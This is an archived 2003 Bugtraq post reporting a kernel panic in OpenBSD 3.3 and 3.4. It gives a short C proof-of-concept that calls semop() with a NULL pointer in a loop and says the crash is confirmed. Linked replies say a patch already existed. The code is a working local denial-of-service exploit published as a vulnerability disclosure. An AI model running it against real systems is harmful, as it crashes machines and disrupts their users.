yet another panic() in OpenBSD

noir_at_uberhax0r.net
Date: 11/21/03

  • Next message: :: Operash ::: "[Opera 7] Arbitrary File Auto-Saved Vulnerability."
    Date: Fri, 21 Nov 2003 17:46:01 -0500 (EST)
    To: bugtraq@securityfocus.com
    
    

    a project lacking the basic QA and unit testing and here is the outcome:

    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/sem.h>
    #include <sys/ipc.h>

    int
    main()
    {
        int i;

            for(i = 0; i < 0x40; i++)
                    semop(i, (struct sembuf *) NULL, 0);

    }

    PANIC in OpenBSD 3.3 and 3.4 is confirmed.


  • Next message: :: Operash ::: "[Opera 7] Arbitrary File Auto-Saved Vulnerability."

    Relevant Pages

    • Re: [Full-Disclosure] yet another panic() in OpenBSD
      ... > a project lacking the basic QA and unit testing and here is the outcome: ... > int i; ... It's not really hard to look at the patch and post to fd afterwards... ...
      (Full-Disclosure)
    • Re: yet another panic() in OpenBSD
      ... > a project lacking the basic QA and unit testing and here is the outcome: ... > int i; ... This patch was out _before_ the above post. ...
      (Bugtraq)
    • [Full-Disclosure] yet another panic() in OpenBSD
      ... a project lacking the basic QA and unit testing and here is the outcome: ... PANIC in OpenBSD 3.3 and 3.4 is confirmed. ...
      (Full-Disclosure)
    • Re: Compiling 2.5.1 on OpenBSD 4.1
      ... my patch would change these circumstances. ... I don't have OpenBSD available, so I have to do all my research over ... int ttyname_r ... Defining _BSD_TYPES brings it back. ...
      (comp.lang.python)
    • Re: RtlMoveMemory to read an integer from a file
      ... > to read an int. ... > Bring the power of unit testing to VS .NET IDE ... >> public static extern void RtlMoveMemory(ref double dest, ref string src, ...
      (microsoft.public.dotnet.languages.csharp)